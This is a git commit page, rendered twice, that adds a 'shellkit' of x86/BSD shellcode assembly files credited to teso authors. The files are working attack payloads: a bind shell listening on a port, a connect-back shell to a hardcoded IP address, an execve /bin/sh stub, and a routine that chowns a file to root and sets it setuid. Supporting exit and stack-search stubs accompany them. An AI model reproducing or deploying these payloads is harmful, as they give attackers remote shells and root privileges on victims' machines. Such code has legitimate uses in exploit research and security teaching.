initial

author: Root THC 2026-02-24 12:42:47 +0000
committer: Root THC 2026-02-24 12:42:47 +0000
commit: c9cbeced5b3f2bdd7407e29c0811e65954132540 (patch)
tree: aefc355416b561111819de159ccbd86c3004cf88 /other/shellkit/x86_bsd
parent: 073fe4bf9fca6bf40cef2886d75df832ef4b6fca (diff)
8 files changed, 238 insertions, 0 deletions
diff --git a/other/shellkit/x86_bsd/FIXME_chmod.s b/other/shellkit/x86_bsd/FIXME_chmod.s
new file mode 100644
index 0000000..6f19d23
--- /dev/null
+++ b/other/shellkit/x86_bsd/FIXME_chmod.s
@@ -0,0 +1,43 @@
+/* x86/BSD PIC local chmod code
+ *
+ * by stealth
+ */
+        .globl cbegin
+        .globl cend
+cbegin:
+        jmp     boomsh
+foo:    popl    %ebx
+        incl    (%ebx)
+        incl    4(%ebx)
+        
+        xorl    %eax, %eax
+        movb    %al, 11(%ebx)
+        
+        movb    $16, %al        /* chown */
+        xorl    %ecx, %ecx
+        pushl   %ecx
+        pushl   %ecx
+        pushl   %ebx
+        pushl   $1
+sys_1:  int     $0x80
+        
+        xorl    %eax, %eax      /* chmod */
+        movb    $15, %al
+        pushw   $06755
+        pushl   %ebx
+        pushl   $1
+sys_2:  int     $0x80
+        
+        xorl    %eax, %eax
+        incl    %eax            /* exit */
+        pushl   $1
+sys_3:  int     $0x80
+boomsh: call foo
+        .string ".tmp.boomsh.";
+cend:
diff --git a/other/shellkit/x86_bsd/bindshell.s b/other/shellkit/x86_bsd/bindshell.s
new file mode 100644
index 0000000..8921fa9
--- /dev/null
+++ b/other/shellkit/x86_bsd/bindshell.s
@@ -0,0 +1,59 @@
+/* x86/BSD bindsh shellcode (73 bytes)
+   
+   lorian / teso
+*/
+        .globl  _cbegin
+        .globl  cbegin
+        .globl  _cend
+        .globl  cend
+_cbegin:
+cbegin:
+        xorl    %ebx, %ebx
+        mull    %ebx
+        pushl   %ebx
+        incl    %ebx
+        pushl   %ebx
+        incl    %ebx
+        pushl   %ebx
+        movb    $0x61, %al
+        pushl   %ebx
+        int     $0x80
+        xchgl   %esi, %eax
+        pushl   %edx
+        pushw   $0x4444
+        pushw   %bx
+        movl    %esp, %ebp
+        pushl   $0x10
+        pushl   %ebp
+        pushl   %esi
+        pushl   %esi
+        pushl   $0x68
+        popl    %eax
+        int     $0x80
+        movb    $0x6a, %al
+        int     $0x80
+        pusha
+        movb    $0x1e, %al
+        int     $0x80
+a:      
+        pushl   %ebx
+        pushl   %eax
+        pushl   %eax
+        movb    $0x5a, %al
+        int     $0x80
+        decl    %ebx
+        jns     a
+        pushl   %edx
+        movl    %esp, %ebx
+        push    $0x68732F6E
+        push    $0x69622F2F
+        pusha   
+        popl    %esi
+        popl    %esi
+        movb    $0x3b, %al
+        int     $0x80
+                                                        
+_cend:
+cend:
diff --git a/other/shellkit/x86_bsd/connectsh b/other/shellkit/x86_bsd/connectsh
new file mode 100644
index 0000000..f9aaab7
--- /dev/null
+++ b/other/shellkit/x86_bsd/connectsh
Binary files differ
diff --git a/other/shellkit/x86_bsd/connectsh.s b/other/shellkit/x86_bsd/connectsh.s
new file mode 100644
index 0000000..562f5ef
--- /dev/null
+++ b/other/shellkit/x86_bsd/connectsh.s
@@ -0,0 +1,51 @@
+/* x86/BSD connectsh shellcode (66 bytes)
+   
+   lorian / teso
+*/
+        .globl  _cbegin
+        .globl  cbegin
+        .globl  _cend
+        .globl  cend
+_cbegin:
+cbegin:
+        xorl    %ebp, %ebp
+        mull    %ebp
+        pushl   %ebp
+        incl    %ebp
+        pushl   %ebp
+        incl    %ebp
+        pushl   %ebp
+        movb    $0x61, %al
+        pushl   %ebp
+        int     $0x80
+        xchgl   %esi, %eax
+        pushl   $0xcab058c3
+        pushw   $0x4444
+        pushw   %bp
+        movl    %esp, %edi
+        pushl   $0x10
+        pushl   %edi
+        pushl   %esi
+        pushl   %esi
+        pushl   $0x62
+        popl    %eax
+        int     $0x80
+a:      pusha   
+        movb    $0x5a, %al
+        int     $0x80
+        decl    %ebp
+        jns     a
+        pushl   %edx
+        movl    %esp, %ebx
+        push    $0x68732F6E
+        push    $0x69622F2F
+        pusha   
+        popl    %esi
+        popl    %esi
+        movb    $0x3b, %al
+        int     $0x80
+                                                        
+_cend:
+cend:
diff --git a/other/shellkit/x86_bsd/execvesh b/other/shellkit/x86_bsd/execvesh
new file mode 100644
index 0000000..7518768
--- /dev/null
+++ b/other/shellkit/x86_bsd/execvesh
Binary files differ
diff --git a/other/shellkit/x86_bsd/execvesh.s b/other/shellkit/x86_bsd/execvesh.s
new file mode 100644
index 0000000..370e7a4
--- /dev/null
+++ b/other/shellkit/x86_bsd/execvesh.s
@@ -0,0 +1,31 @@
+/* x86/BSD execve /bin/sh shellcode
+ *  
+ * lorian / teso
+ */
+/* somehow the obsd on plan9 where i tested it, needs the labels
+ * exported with _ before, while freebsd doesnt 
+ */
+/* argv: OBSD needs a pointer to NULL, FBSD accepts NULL */
+        .globl  cbegin
+        .globl  _cbegin
+        .globl  cend
+        .globl  _cend
+_cbegin:
+cbegin:
+        pushl     $0x3b
+        popl      %eax
+        cdq
+        pushl     %edx
+        movl      %esp, %ebx
+        push      $0x68732F6E
+        push      $0x69622F2F
+        pusha                 /* FULLPOWER */
+        pop       %esi
+        pop       %esi
+        int       $0x80
+_cend:
+cend:
diff --git a/other/shellkit/x86_bsd/exit.s b/other/shellkit/x86_bsd/exit.s
new file mode 100644
index 0000000..7993035
--- /dev/null
+++ b/other/shellkit/x86_bsd/exit.s
@@ -0,0 +1,18 @@
+/* x86/BSD exit shellcode
+ *
+ * lorian / teso 
+ */
+        .globl  cbegin
+        .globl  _cbegin
+        .globl  cend
+        .globl  _cend
+_cbegin:
+cbegin:
+        xorl    %eax,   %eax
+        incl    %eax
+        int     $0x80
+_cend:
+cend:
diff --git a/other/shellkit/x86_bsd/spset.s b/other/shellkit/x86_bsd/spset.s
new file mode 100644
index 0000000..9bc19f4
--- /dev/null
+++ b/other/shellkit/x86_bsd/spset.s
@@ -0,0 +1,36 @@
+/* x86 spset shellcode
+ *
+ * lorian / teso 
+ */
+        .globl  cbegin
+        .globl  _cbegin
+        .globl  cend
+        .globl  _cend
+/* searches for 512 bytes "free" space on stack without destroying it
+ * like any kind of call would do...
+ *
+ * NOTE: your real shellcode must be terminated with 
+ *       \x78\x56\x34\x12 for this code to work... 
+ */
+_cbegin:
+cbegin:
+        movl    $0x12345678, %eax
+a:
+        cdq
+        movb    $0x02, %dh
+b:
+        popl    %ebx
+        pushl   %ebx
+        incl    %esp
+        decl    %edx
+        jz      c
+        cmpl    %eax, %ebx
+        je      a
+        jmp     b
+c:
+_cend:
+cend:
author	Root THC	2026-02-24 12:42:47 +0000
committer	Root THC	2026-02-24 12:42:47 +0000
commit	c9cbeced5b3f2bdd7407e29c0811e65954132540 (patch)
tree	aefc355416b561111819de159ccbd86c3004cf88 /other/shellkit/x86_bsd
parent	073fe4bf9fca6bf40cef2886d75df832ef4b6fca (diff)

diff --git a/other/shellkit/x86_bsd/FIXME_chmod.s b/other/shellkit/x86_bsd/FIXME_chmod.s new file mode 100644 index 0000000..6f19d23 --- /dev/null +++ b/other/shellkit/x86_bsd/FIXME_chmod.s
@@ -0,0 +1,43 @@
	1	/* x86/BSD PIC local chmod code
	2	*
	3	* by stealth
	4	*/
	5
	6	.globl cbegin
	7	.globl cend
	8
	9	cbegin:
	10	jmp boomsh
	11
	12	foo: popl %ebx
	13	incl (%ebx)
	14	incl 4(%ebx)
	15
	16	xorl %eax, %eax
	17	movb %al, 11(%ebx)
	18
	19	movb $16, %al /* chown */
	20	xorl %ecx, %ecx
	21	pushl %ecx
	22	pushl %ecx
	23	pushl %ebx
	24	pushl $1
	25	sys_1: int $0x80
	26
	27	xorl %eax, %eax /* chmod */
	28	movb $15, %al
	29	pushw $06755
	30	pushl %ebx
	31	pushl $1
	32	sys_2: int $0x80
	33
	34	xorl %eax, %eax
	35	incl %eax /* exit */
	36	pushl $1
	37	sys_3: int $0x80
	38
	39	boomsh: call foo
	40	.string ".tmp.boomsh.";
	41	cend:
	42
	43


diff --git a/other/shellkit/x86_bsd/bindshell.s b/other/shellkit/x86_bsd/bindshell.s new file mode 100644 index 0000000..8921fa9 --- /dev/null +++ b/other/shellkit/x86_bsd/bindshell.s
@@ -0,0 +1,59 @@
	1	/* x86/BSD bindsh shellcode (73 bytes)
	2
	3	lorian / teso
	4	*/
	5
	6	.globl _cbegin
	7	.globl cbegin
	8	.globl _cend
	9	.globl cend
	10
	11	_cbegin:
	12	cbegin:
	13	xorl %ebx, %ebx
	14	mull %ebx
	15	pushl %ebx
	16	incl %ebx
	17	pushl %ebx
	18	incl %ebx
	19	pushl %ebx
	20	movb $0x61, %al
	21	pushl %ebx
	22	int $0x80
	23	xchgl %esi, %eax
	24	pushl %edx
	25	pushw $0x4444
	26	pushw %bx
	27	movl %esp, %ebp
	28	pushl $0x10
	29	pushl %ebp
	30	pushl %esi
	31	pushl %esi
	32	pushl $0x68
	33	popl %eax
	34	int $0x80
	35	movb $0x6a, %al
	36	int $0x80
	37	pusha
	38	movb $0x1e, %al
	39	int $0x80
	40	a:
	41	pushl %ebx
	42	pushl %eax
	43	pushl %eax
	44	movb $0x5a, %al
	45	int $0x80
	46	decl %ebx
	47	jns a
	48	pushl %edx
	49	movl %esp, %ebx
	50	push $0x68732F6E
	51	push $0x69622F2F
	52	pusha
	53	popl %esi
	54	popl %esi
	55	movb $0x3b, %al
	56	int $0x80
	57
	58	_cend:
	59	cend:


diff --git a/other/shellkit/x86_bsd/connectsh b/other/shellkit/x86_bsd/connectsh new file mode 100644 index 0000000..f9aaab7 --- /dev/null +++ b/other/shellkit/x86_bsd/connectsh
Binary files differ


diff --git a/other/shellkit/x86_bsd/connectsh.s b/other/shellkit/x86_bsd/connectsh.s new file mode 100644 index 0000000..562f5ef --- /dev/null +++ b/other/shellkit/x86_bsd/connectsh.s
@@ -0,0 +1,51 @@
	1	/* x86/BSD connectsh shellcode (66 bytes)
	2
	3	lorian / teso
	4	*/
	5
	6	.globl _cbegin
	7	.globl cbegin
	8	.globl _cend
	9	.globl cend
	10
	11	_cbegin:
	12	cbegin:
	13	xorl %ebp, %ebp
	14	mull %ebp
	15	pushl %ebp
	16	incl %ebp
	17	pushl %ebp
	18	incl %ebp
	19	pushl %ebp
	20	movb $0x61, %al
	21	pushl %ebp
	22	int $0x80
	23	xchgl %esi, %eax
	24	pushl $0xcab058c3
	25	pushw $0x4444
	26	pushw %bp
	27	movl %esp, %edi
	28	pushl $0x10
	29	pushl %edi
	30	pushl %esi
	31	pushl %esi
	32	pushl $0x62
	33	popl %eax
	34	int $0x80
	35	a: pusha
	36	movb $0x5a, %al
	37	int $0x80
	38	decl %ebp
	39	jns a
	40	pushl %edx
	41	movl %esp, %ebx
	42	push $0x68732F6E
	43	push $0x69622F2F
	44	pusha
	45	popl %esi
	46	popl %esi
	47	movb $0x3b, %al
	48	int $0x80
	49
	50	_cend:
	51	cend:


diff --git a/other/shellkit/x86_bsd/execvesh b/other/shellkit/x86_bsd/execvesh new file mode 100644 index 0000000..7518768 --- /dev/null +++ b/other/shellkit/x86_bsd/execvesh
Binary files differ


diff --git a/other/shellkit/x86_bsd/execvesh.s b/other/shellkit/x86_bsd/execvesh.s new file mode 100644 index 0000000..370e7a4 --- /dev/null +++ b/other/shellkit/x86_bsd/execvesh.s
@@ -0,0 +1,31 @@
	1	/* x86/BSD execve /bin/sh shellcode
	2	*
	3	* lorian / teso
	4	*/
	5
	6	/* somehow the obsd on plan9 where i tested it, needs the labels
	7	* exported with _ before, while freebsd doesnt
	8	*/
	9
	10	/* argv: OBSD needs a pointer to NULL, FBSD accepts NULL */
	11
	12	.globl cbegin
	13	.globl _cbegin
	14	.globl cend
	15	.globl _cend
	16
	17	_cbegin:
	18	cbegin:
	19	pushl $0x3b
	20	popl %eax
	21	cdq
	22	pushl %edx
	23	movl %esp, %ebx
	24	push $0x68732F6E
	25	push $0x69622F2F
	26	pusha /* FULLPOWER */
	27	pop %esi
	28	pop %esi
	29	int $0x80
	30	_cend:
	31	cend:


diff --git a/other/shellkit/x86_bsd/exit.s b/other/shellkit/x86_bsd/exit.s new file mode 100644 index 0000000..7993035 --- /dev/null +++ b/other/shellkit/x86_bsd/exit.s
@@ -0,0 +1,18 @@
	1	/* x86/BSD exit shellcode
	2	*
	3	* lorian / teso
	4	*/
	5	.globl cbegin
	6	.globl _cbegin
	7	.globl cend
	8	.globl _cend
	9
	10	_cbegin:
	11	cbegin:
	12
	13	xorl %eax, %eax
	14	incl %eax
	15	int $0x80
	16
	17	_cend:
	18	cend:


diff --git a/other/shellkit/x86_bsd/spset.s b/other/shellkit/x86_bsd/spset.s new file mode 100644 index 0000000..9bc19f4 --- /dev/null +++ b/other/shellkit/x86_bsd/spset.s
@@ -0,0 +1,36 @@
	1	/* x86 spset shellcode
	2	*
	3	* lorian / teso
	4	*/
	5	.globl cbegin
	6	.globl _cbegin
	7	.globl cend
	8	.globl _cend
	9
	10	/* searches for 512 bytes "free" space on stack without destroying it
	11	* like any kind of call would do...
	12	*
	13	* NOTE: your real shellcode must be terminated with
	14	* \x78\x56\x34\x12 for this code to work...
	15	*/
	16
	17	_cbegin:
	18	cbegin:
	19
	20	movl $0x12345678, %eax
	21	a:
	22	cdq
	23	movb $0x02, %dh
	24	b:
	25	popl %ebx
	26	pushl %ebx
	27	incl %esp
	28	decl %edx
	29	jz c
	30	cmpl %eax, %ebx
	31	je a
	32	jmp b
	33	c:
	34
	35	_cend:
	36	cend: